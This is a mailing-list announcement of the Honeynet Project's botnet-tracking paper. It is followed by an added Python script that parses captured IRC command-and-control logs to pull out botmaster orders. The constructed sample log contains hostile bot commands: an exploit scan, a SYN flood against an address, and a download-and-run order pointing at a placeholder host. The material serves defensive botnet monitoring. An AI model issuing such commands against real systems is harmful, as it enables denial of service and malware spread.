[Full-disclosure] Know Your Enemy: Tracking Botnets

From: Thorsten Holz (thorsten.holz_at_mmweg.rwth-aachen.de)
Date: 03/14/05

  • Next message: pingywon: "Re: [Full-disclosure] Know Your Enemy: Tracking Botnets"
    Date: Mon, 14 Mar 2005 04:08:15 +0100
    To: dailydave <dailydave@lists.immunitysec.com>, honeypots@securityfocus.com, full-disclosure@lists.grok.org.uk


    The Honeynet Project and Research Alliance is excited to announce the
    release of a new paper "KYE: Tracking Botnets". This paper is based on
    the extensive research by the German Honeynet Project.

        KYE: Tracking Botnets


    Honeypots are a well known technique for discovering the tools, tactics,
    and motives of attackers. In this paper we look at a special kind of
    threat: the individuals and organizations who run botnets. A botnet is a
    network of compromised machines that can be remotely controlled by an
    attacker. Due to their immense size (tens of thousands of systems can be
    linked together), they pose a severe threat to the community. With the
    help of honeynets we can observe the people who run botnets - a task
    that is difficult using other techniques. Due to the wealth of data
    logged, it is possible to reconstruct the actions of attackers, the
    tools they use, and study them in detail. In this paper we take a closer
    look at botnets, common attack techniques, and the individuals involved.

    We start with an introduction to botnets and how they work, with
    examples of their uses. We then briefly analyze the three most common
    bot variants used. Next we discuss a technique to observe botnets,
    allowing us to monitor the botnet and observe all commands issued by the
    attacker. We present common behavior we captured, as well as statistics
    on the quantitative information learned through monitoring more than one
    hundred botnets during the last few months. We conclude with an overview
    of lessons learned and point out further research topics in the area of
    botnet-tracking, including a tool called mwcollect2 that focuses on
    collecting malware in an automated fashion.

    Thank you for your time,
       Thorsten Holz, on behalf of the GHP

    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://www.secunia.com/
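The observation technique the abstract refers to comes down to joining the command-and-control channel with a drone and recording what the botmaster says. As an added example, not code from the paper or from the Honeynet Project, the block below parses a captured IRC session and pulls out the lines a bot would have treated as orders. It assumes commands are delivered as channel messages or through the channel topic and that they start with a prefix character such as "." or "!"; the server name, nicks, channel and command strings in SAMPLE_LOG are constructed for illustration.

```python
"""Extract botnet-herder commands from captured IRC C&C traffic.

Added example; not code from the KYE paper or the Honeynet Project.
Host names, nicks, channel and bot command syntax in SAMPLE_LOG are
constructed for illustration only.
"""
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Characters a herder puts in front of a command so bots can tell it apart
# from ordinary chatter (assumption: "." and "!" are the ones in use).
COMMAND_PREFIXES = (".", "!")


@dataclass
class IrcMessage:
    prefix: Optional[str]   # "nick!user@host" or server name, without ':'
    command: str            # verb or three-digit numeric, upper-cased
    params: List[str]       # middle params plus the trailing param, if any

    @property
    def nick(self) -> Optional[str]:
        """Nick part of the prefix (the server name for server messages)."""
        return None if self.prefix is None else self.prefix.split("!", 1)[0]


def parse_irc(line: str) -> IrcMessage:
    """Split one RFC 1459 line into prefix, command and params.

    The trailing parameter (everything after the first ' :') may contain
    spaces and is kept whole."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    params = head.split()
    if sep:
        params.append(trailing)
    return IrcMessage(prefix, params[0].upper(), params[1:])


@dataclass
class HerderCommand:
    source: Optional[str]   # who issued it (server name for a topic seen on join)
    target: str             # channel or nick it was delivered to
    text: str               # the command line exactly as the bots received it
    via: str                # PRIVMSG, TOPIC or 332 (RPL_TOPIC)


def extract_commands(log: str,
                     prefixes: Tuple[str, ...] = COMMAND_PREFIXES) -> List[HerderCommand]:
    """Return every line a bot in the channel would act on.

    Commands reach the bots three ways: a PRIVMSG to the channel, a TOPIC
    change, or the RPL_TOPIC (332) numeric a bot receives on joining a
    channel whose topic already holds the standing order."""
    found = []
    for raw in log.splitlines():
        if not raw.strip():
            continue
        msg = parse_irc(raw)
        if msg.command in ("PRIVMSG", "TOPIC") and len(msg.params) >= 2:
            target, text = msg.params[0], msg.params[-1]
        elif msg.command == "332" and len(msg.params) >= 3:
            target, text = msg.params[1], msg.params[-1]
        else:
            continue                      # joins, names lists, pings, ...
        if text.startswith(prefixes):     # bot replies and chatter are skipped
            found.append(HerderCommand(msg.nick, target, text, msg.command))
    return found


def commands_by_source(cmds: List[HerderCommand]) -> Counter:
    """Count commands per issuing nick; a quick way to spot the herders."""
    return Counter(c.source for c in cmds)


# Constructed C&C session as a drone would log it (not real captured traffic).
SAMPLE_LOG = """\
:irc.example.test 001 drone01 :Welcome to the network
:drone01!drone@10.0.0.5 JOIN :#payload
:irc.example.test 332 drone01 #payload :.advscan lsass 200 5 0 -r -s
:irc.example.test 353 drone01 = #payload :drone01 herder
:herder!op@203.0.113.7 PRIVMSG #payload :.ddos.syn 198.51.100.9 80 600
:herder!op@203.0.113.7 PRIVMSG #payload :hi there
:herder!op@203.0.113.7 TOPIC #payload :!download http://203.0.113.7/x.exe x.exe 1
:drone01!drone@10.0.0.5 PRIVMSG #payload :[SCAN]: Random Port Scan started on 10.0.x.x:445
PING :irc.example.test
"""

if __name__ == "__main__":
    cmds = extract_commands(SAMPLE_LOG)
    for c in cmds:
        print(f"{c.via:7} {str(c.source):18} {c.target:9} {c.text}")
    print(commands_by_source(cmds))
```

Run against the constructed log, the parser reports the standing order carried in the topic on join, the DDoS command sent to the channel, and the new topic set by the herder, while ignoring the bot's own status report and the ordinary chat line; a real capture would be fed in the same way, line by line, from the drone's log.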